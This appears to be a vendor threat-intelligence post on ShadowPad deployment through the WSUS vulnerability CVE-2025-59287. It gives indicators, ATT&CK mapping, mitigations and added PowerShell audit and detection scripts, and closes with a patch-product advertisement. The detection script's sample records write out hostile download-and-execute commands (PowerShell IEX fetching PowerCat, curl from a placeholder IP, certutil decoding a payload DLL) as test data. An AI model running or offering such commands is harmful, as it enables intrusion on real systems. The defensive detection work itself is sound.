ShadowPad’s Silent Invasion: Crafting Persistence Through WSUS Exploitation

The ShadowPad malware campaign represents an urgent and advanced cybersecurity threat, exploiting a critical vulnerability in Microsoft’s WSUS service to gain full system access. This highly modular backdoor is being actively leveraged by state-aligned threat actors to target key sectors globally, emphasizing the need for immediate detection and mitigation efforts.

Executive Summary

A sophisticated cyberattack campaign, identified in November 2025, leverages a critical vulnerability in Microsoft Windows Server Update Services (WSUS) to deploy ShadowPad, a highly modular backdoor malware used extensively by Chinese state-sponsored APT groups for espionage operations.

ShadowPad is a privately sold, modular backdoor platform that has been active since 2015 and is widely considered the successor to PlugX. The malware operates through DLL sideloading, leveraging a legitimate executable (ETDCtrlHelper.exe) to load a malicious DLL payload (ETDApix.dll), which serves as a memory-resident loader to execute the backdoor. Upon execution, ShadowPad launches a core module responsible for loading other plugins embedded in the shellcode into memory, enabling flexible remote control capabilities including command execution, lateral movement, and data exfiltration.

Attack Methodology

The ShadowPad campaign has targeted organizations globally, with SentinelOne research identifying over 70 victims across multiple sectors including manufacturing, government, finance, telecommunications, and research between July 2024 and March 2025.

Exploitation of CVE-2025-59287

Beginning October 22, 2025, threat actors rapidly weaponized the publicly released proof-of-concept exploit for CVE-2025-59287 to target WSUS servers exposed on TCP ports 8530 and 8531. The vulnerability stems from unsafe deserialization of untrusted data within WSUS reporting web services, allowing remote unauthenticated attackers to execute arbitrary code with SYSTEM privileges.

Initial Access and Foothold Establishment

After exploiting the WSUS vulnerability, attackers deployed PowerCat, an open-source PowerShell-based Netcat utility, to establish an interactive command shell on compromised servers. The observed PowerShell command downloaded PowerCat from GitHub and connected to a remote C2 IP address (154.17.26[.]41) on port 8080, granting complete control of the host.

ShadowPad Installation via Living-off-the-Land Binaries

On November 6, 2025, attackers exploited the same vulnerability to execute legitimate Windows utilities (curl.exe and certutil.exe) for malware delivery. The attackers downloaded base64-encoded ShadowPad components from an external server (149.28.78[.]189:42306), decoded them using certutil, and deployed the malware directly onto victim systems.

Exploited Vulnerabilities

CVE ID         | Impact                                                                     | Exploit Prerequisites                              | CVSS Score | EPSS Score
---------------|----------------------------------------------------------------------------|----------------------------------------------------|------------|-----------
CVE-2025-59287 | Remote code execution with SYSTEM privileges via WSUS deserialization flaw | Network access to WSUS server on ports 8530/8531   | 9.8        | 64.04%
CVE-2024-24919 | VPN credential theft enabling initial network access                       | Unpatched Check Point gateway devices              | 8.6        | 94.34%
CVE-2021-26855 | Microsoft Exchange ProxyLogon RCE                                          | Unpatched Exchange servers                         | 9.1        | 94.37%

Mitigation & Remediation

Given the active exploitation of CVE-2025-59287 to deploy ShadowPad, immediate mitigation is critical:

  • Apply Microsoft’s out-of-band security update (KB5070881/KB5070882) released October 23, 2025, to address CVE-2025-59287.
  • Block inbound traffic to TCP ports 8530 and 8531 on host-level firewalls to remove the attack vector.
  • Review WSUS server exposure and ensure only Microsoft Update servers can access WSUS infrastructure.
  • Audit for suspicious activity including execution history of PowerShell, certutil.exe, and curl.exe, and network connection logs for anomalous patterns.
  • Monitor for DLL sideloading indicators including suspicious ETDCtrlHelper.exe and ETDApix.dll file combinations.
  • Disable the WSUS Server Role temporarily if patching cannot be applied immediately.
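The following script is an added example, not code from the original article or from Microsoft: it audits the mitigations listed above on a WSUS host and can apply the host-level firewall block. The KB numbers and ports come from the article; the function names, the firewall rule name and the dry-run behaviour are this example's own assumptions. It runs from an elevated PowerShell session on the WSUS server itself.

```powershell
# Added example, not code from the original article: audits the CVE-2025-59287
# mitigations on a WSUS host. KB numbers and ports are from the article; the
# function names and the firewall rule name are this example's own.
# Run from an elevated PowerShell session on the WSUS server.

$OutOfBandKBs = @('KB5070881', 'KB5070882')   # out-of-band updates named in the article
$WsusPorts    = @(8530, 8531)                  # WSUS HTTP / HTTPS listener ports

function Test-WsusOutOfBandUpdate {
    # Passes when at least one of the out-of-band updates is installed.
    $found = Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $OutOfBandKBs -contains $_.HotFixID } |
        Select-Object -ExpandProperty HotFixID
    $detail = if ($found) { "Installed: $($found -join ', ')" } else { 'Neither KB5070881 nor KB5070882 is installed' }
    [pscustomobject]@{ Check = 'OutOfBandUpdate'; Passed = [bool]$found; Detail = $detail }
}

function Get-WsusRoleState {
    # Reports whether the WSUS role is present (ServerManager module, Windows Server only).
    $feature = Get-WindowsFeature -Name UpdateServices -ErrorAction SilentlyContinue
    $detail  = if ($feature -and $feature.Installed) { 'UpdateServices role is installed' } else { 'UpdateServices role is not installed' }
    [pscustomobject]@{ Check = 'WsusRole'; Passed = $null; Detail = $detail }
}

function Get-WsusListenerExposure {
    # Lists what is listening on the WSUS ports and every enabled inbound allow rule covering them.
    $listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $WsusPorts -contains $_.LocalPort } |
        ForEach-Object { "$($_.LocalAddress):$($_.LocalPort) pid=$($_.OwningProcess)" }
    $allowRules = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue |
        Where-Object {
            $pf = $_ | Get-NetFirewallPortFilter
            # LocalPort is a string or string[] such as 'Any', '8530' or '8530-8531'; ranges are not expanded here
            $pf.Protocol -eq 'TCP' -and (($pf.LocalPort -contains 'Any') -or ($pf.LocalPort | Where-Object { $WsusPorts -contains $_ }))
        } | Select-Object -ExpandProperty DisplayName
    [pscustomobject]@{
        Check  = 'ListenerExposure'
        Passed = -not $allowRules
        Detail = "Listening: $($listeners -join '; ') | inbound allow rules covering 8530/8531: $($allowRules -join '; ')"
    }
}

function Add-WsusInboundBlockRule {
    # Creates the host-level inbound block for 8530/8531; dry run unless -Apply is given.
    param([switch]$Apply)
    $name = 'Block WSUS inbound (CVE-2025-59287 mitigation)'   # rule name is this example's own
    if (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue) { return "Rule '$name' already exists" }
    if (-not $Apply) { return "Dry run: would create an inbound TCP block for ports $($WsusPorts -join ', ')" }
    New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol TCP -LocalPort $WsusPorts -Action Block -Profile Any | Out-Null
    return "Created rule '$name'"
}

@(Test-WsusOutOfBandUpdate; Get-WsusRoleState; Get-WsusListenerExposure) | Format-List
Add-WsusInboundBlockRule          # add -Apply to actually create the block rule
```

The block rule is intentionally a dry run by default: on a server that must keep serving downstream WSUS clients, the listener exposure report tells you which existing allow rules to scope to those clients rather than blocking the ports outright. Removing the role with Uninstall-WindowsFeature is the last resort the article mentions, so the script only reports the role state.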

Capabilities

ShadowPad demonstrates sophisticated capabilities designed for long-term espionage operations:

  • Modular backdoor architecture enabling dynamic plugin loading from C2 servers during runtime.
  • DLL Search Order Hijacking execution via legitimate executables like ETDCtrlHelper.exe to evade detection.
  • Multi-protocol C2 communications supporting TCP, UDP, HTTP, HTTPS, SSL, and DNS protocols.
  • Domain Generation Algorithm (DGA) based on the day of the month for resilient C2 connectivity.
  • System reconnaissance including hostname, username, OS version, memory status, and CPU frequency collection.
  • Registry-based persistence and configuration storage using virtual file systems.
  • Process injection capabilities targeting legitimate Windows processes including svchost.exe, Windows Mail, and Windows Media Player.

Visual Flow

  • Initial Access: internet scanning for exposed WSUS servers.
  • Exploitation: CVE-2025-59287, crafted SOAP request to WSUS on 8530/8531.
  • Foothold / Payload Delivery: PowerShell PowerCat for an interactive SYSTEM shell; curl.exe/certutil.exe used to fetch and decode ShadowPad components.
  • Execution & Persistence: DLL sideloading via ETDCtrlHelper.exe; registry edits; scheduled task under Microsoft\Windows\UPnP; service install "Q-X64 Service".
  • Command & Control: HTTP/HTTPS to C2 163.61.102[.]245:443 with a spoofed Firefox User-Agent.
  • Impact: long-term espionage (data exfiltration, lateral movement, plugin deployment for surveillance).

Indicators of Compromise

The ShadowPad campaign exposes several host, network, and behavioral indicators that organizations can use to detect potential compromise:

Host-Based IOCs

  • Malicious DLL (ETDApix.dll) delivered via DLL sideloading with legitimate executable (ETDCtrlHelper.exe).
  • Configuration file: 0C137A80.tmp in %PROGRAMDATA% directory.
  • Service creation: “Q-X64” with description “Q-X64 Service for windows.”
  • Scheduled task under: Microsoft\Windows\UPnP named “Microsoft Corporation.”
  • Registry persistence: SOFTWARE\Microsoft\Windows\CurrentVersion\Run with value “Q-X64.”
  • Process injection into: WinMail.exe, wmpnetwk.exe, wmplayer.exe, svchost.exe.
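The script below is an added example rather than code from the article: a read-only sweep of a single host for the artifacts listed above. The artifact names, paths, service, task and Run-key value come from the article; the function name, the default search roots and the output shape are this example's own assumptions. Because ELAN's own touchpad driver ships ETDCtrlHelper.exe and ETDApix.dll together, the sideloading check reports the DLL's Authenticode status and SHA-256 hash so that an analyst can separate the legitimate pair from a planted one.

```powershell
# Added example, not code from the original article: read-only sweep of one host
# for the ShadowPad artifacts listed above. Artifact names and paths are from the
# article; the function name, search roots and output shape are this example's own.
# Run from an elevated PowerShell session; it changes nothing on the host.

function Find-ShadowPadHostArtifacts {
    param(
        # Where to look for the sideloading pair; an assumption, widen or narrow as needed.
        [string[]]$SearchRoots = @($env:ProgramData, $env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:PUBLIC, $env:TEMP)
    )
    $hits = [System.Collections.Generic.List[object]]::new()
    $add  = { param($Indicator, $Detail) $hits.Add([pscustomobject]@{ Indicator = $Indicator; Detail = $Detail }) }

    # 1. Configuration file 0C137A80.tmp in %PROGRAMDATA%
    $cfg = Join-Path $env:ProgramData '0C137A80.tmp'
    if (Test-Path -LiteralPath $cfg) { & $add 'ConfigFile' $cfg }

    # 2. Service named Q-X64, or one carrying its description
    Get-CimInstance Win32_Service -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -eq 'Q-X64' -or $_.DisplayName -eq 'Q-X64' -or $_.Description -like 'Q-X64 Service*' } |
        ForEach-Object { & $add 'Service' "$($_.Name) -> $($_.PathName)" }

    # 3. Scheduled task "Microsoft Corporation" under \Microsoft\Windows\UPnP\
    Get-ScheduledTask -TaskPath '\Microsoft\Windows\UPnP\' -ErrorAction SilentlyContinue |
        Where-Object TaskName -eq 'Microsoft Corporation' |
        ForEach-Object {
            $actions = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
            & $add 'ScheduledTask' "$($_.TaskPath)$($_.TaskName): $actions"
        }

    # 4. Run-key value Q-X64 in the machine and user hives (32-bit view included)
    foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                     'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
                     'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') {
        $val = Get-ItemProperty -Path $key -Name 'Q-X64' -ErrorAction SilentlyContinue
        if ($val) { & $add 'RunKey' "$key\Q-X64 = $($val.'Q-X64')" }
    }

    # 5. ETDApix.dll sitting next to ETDCtrlHelper.exe. ELAN's driver ships both files
    #    signed, so the DLL's signature status and hash decide, not the file names.
    Get-ChildItem -Path ($SearchRoots | Where-Object { $_ }) -Recurse -Filter 'ETDApix.dll' -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $exe = Join-Path $_.DirectoryName 'ETDCtrlHelper.exe'
            if (Test-Path -LiteralPath $exe) {
                $sig  = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
                $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $_.FullName).Hash
                & $add 'SideloadPair' "$($_.FullName) (signature: $sig, sha256: $hash) beside $exe"
            }
        }
    return $hits
}

$findings = Find-ShadowPadHostArtifacts
if (@($findings).Count -eq 0) { 'No ShadowPad host artifacts found' } else { $findings | Format-Table -AutoSize -Wrap }
```

A SideloadPair hit whose DLL reports a signature status of NotSigned, or whose hash does not match the copy from a known-clean ELAN installation, is the one to escalate; the other four checks have no benign explanation on a server and should be treated as confirmed compromise indicators pending incident response.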

Behavioral IOCs

  • PowerShell execution downloading PowerCat from GitHub repositories.
  • Certutil.exe usage for base64 decoding of downloaded files.
  • Curl.exe downloading .txt files from external IP addresses.
  • Unexpected child processes spawned from wsusservice.exe or w3wp.exe.
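As an added example that is not part of the original article, the following rule set turns the four behavioral indicators above into checks over process-creation records and runs them against constructed sample data. The field names follow Windows Security event 4688 (NewProcessName, ParentProcessName, CommandLine); the sample records, their paths and the 203.0.113.10 address are made up for the example, and the function and rule names are this example's own. Only the 42306 port and the GitHub/PowerCat, certutil and curl patterns are taken from the article.

```powershell
# Added example, not code from the original article: detection rules for the
# behavioral indicators above, run over constructed process-creation records.
# Field names follow Security event 4688; sample data and IP addresses are made up,
# and the function and rule names are this example's own.

$ShadowPadBehaviorRules = @(
    @{ Name = 'WSUS or IIS worker spawning a child process'
       Test = { param($e) $e.ParentProcessName -match '\\(wsusservice|w3wp)\.exe$' } }
    @{ Name = 'PowerShell pulling PowerCat from GitHub'
       Test = { param($e) $e.NewProcessName -match '\\(powershell|pwsh)\.exe$' -and $e.CommandLine -match 'powercat|github(usercontent)?\.com' } }
    @{ Name = 'certutil used as a base64 decoder'
       Test = { param($e) $e.NewProcessName -match '\\certutil\.exe$' -and $e.CommandLine -match '(^|\s)-decode(\s|$)' } }
    @{ Name = 'curl fetching a .txt file from a raw IP address'
       Test = { param($e) $e.NewProcessName -match '\\curl\.exe$' -and $e.CommandLine -match 'https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?/\S*\.txt' } }
)

function Test-ShadowPadBehavior {
    # Emits one record per (event, rule) match; events that match nothing produce no output.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        foreach ($rule in $ShadowPadBehaviorRules) {
            if (& $rule.Test $Event) {
                [pscustomobject]@{
                    Rule        = $rule.Name
                    Time        = $Event.TimeCreated
                    Parent      = $Event.ParentProcessName
                    Process     = $Event.NewProcessName
                    CommandLine = $Event.CommandLine
                }
            }
        }
    }
}

function ConvertFrom-Event4688 {
    # Flattens a live Security 4688 record into the shape the rules expect. CommandLine is
    # only populated when "Include command line in process creation events" is enabled.
    param([Parameter(Mandatory, ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    process {
        $x = [xml]$Record.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            TimeCreated       = $Record.TimeCreated
            NewProcessName    = $d['NewProcessName']
            ParentProcessName = $d['ParentProcessName']
            CommandLine       = $d['CommandLine']
        }
    }
}

# Constructed sample records: the first four mirror the chain described in the article,
# the last two are benign and must not fire any rule.
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2025-11-06T10:01:00Z'; ParentProcessName = 'C:\Program Files\Update Services\Service\WsusService.exe'; NewProcessName = 'C:\Windows\System32\cmd.exe';           CommandLine = 'cmd.exe /c powershell -nop -w hidden -c "..."' }
    [pscustomobject]@{ TimeCreated = '2025-11-06T10:01:02Z'; ParentProcessName = 'C:\Windows\System32\inetsrv\w3wp.exe';                    NewProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -nop -c "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/EXAMPLE/powercat/master/powercat.ps1''); ..."' }
    [pscustomobject]@{ TimeCreated = '2025-11-06T10:03:00Z'; ParentProcessName = 'C:\Windows\System32\cmd.exe';                             NewProcessName = 'C:\Windows\System32\curl.exe';          CommandLine = 'curl.exe -o C:\ProgramData\a.txt http://203.0.113.10:42306/a.txt' }
    [pscustomobject]@{ TimeCreated = '2025-11-06T10:03:05Z'; ParentProcessName = 'C:\Windows\System32\cmd.exe';                             NewProcessName = 'C:\Windows\System32\certutil.exe';      CommandLine = 'certutil.exe -decode C:\ProgramData\a.txt C:\ProgramData\ETDApix.dll' }
    [pscustomobject]@{ TimeCreated = '2025-11-06T10:05:00Z'; ParentProcessName = 'C:\Windows\explorer.exe';                                 NewProcessName = 'C:\Windows\System32\notepad.exe';       CommandLine = 'notepad.exe C:\Users\admin\notes.txt' }
    [pscustomobject]@{ TimeCreated = '2025-11-06T10:06:00Z'; ParentProcessName = 'C:\Windows\System32\cmd.exe';                             NewProcessName = 'C:\Windows\System32\curl.exe';          CommandLine = 'curl.exe -sS https://example.com/index.html' }
)

$SampleEvents | Test-ShadowPadBehavior | Format-Table -AutoSize -Wrap

# Against the live log on a WSUS server (requires process-creation auditing with command line):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } | ConvertFrom-Event4688 | Test-ShadowPadBehavior
```

Run as written, the second sample record fires two rules (it is both a child of w3wp.exe and a PowerShell fetch of PowerCat), the first, third and fourth fire one each, and the two benign records fire none. The first rule is deliberately broad, since on a WSUS server any child of WsusService.exe or the WSUS application pool's w3wp.exe is worth a look; tune it with an allow list of expected children before deploying it as an alert.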

These indicators collectively reflect Chinese APT groups’ sophisticated tradecraft—leveraging zero-day exploitation, living-off-the-land binaries, and modular malware platforms—to deploy ShadowPad and maintain persistent access for espionage operations.

Tactics and Techniques

Attackers are exploiting critical infrastructure components to achieve remote code execution and establish persistent backdoor access.

TA0001 – Initial Access: Attackers gain entry through exploitation of the CVE-2025-59287 deserialization vulnerability in publicly exposed WSUS servers.

T1190 – Exploit Public-Facing Application: Exploitation of WSUS web service endpoints to achieve unauthenticated remote code execution with SYSTEM privileges.

TA0002 – Execution: Execution of malicious payloads via PowerShell (PowerCat), certutil, and curl following successful exploitation.

T1059.001 – Command and Scripting Interpreter: PowerShell: Use of PowerShell to download and execute PowerCat for establishing reverse shell connections.

TA0003 – Persistence: Establishment of persistence via registry modifications, scheduled tasks, and Windows service creation (Q-X64).

T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking: Leveraging legitimate ELAN touchpad executable (ETDCtrlHelper.exe) to sideload malicious ShadowPad loader DLL.

T1071 – Application Layer Protocol: ShadowPad communicates over HTTP/HTTPS to C2 servers using spoofed browser headers to blend with legitimate traffic.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.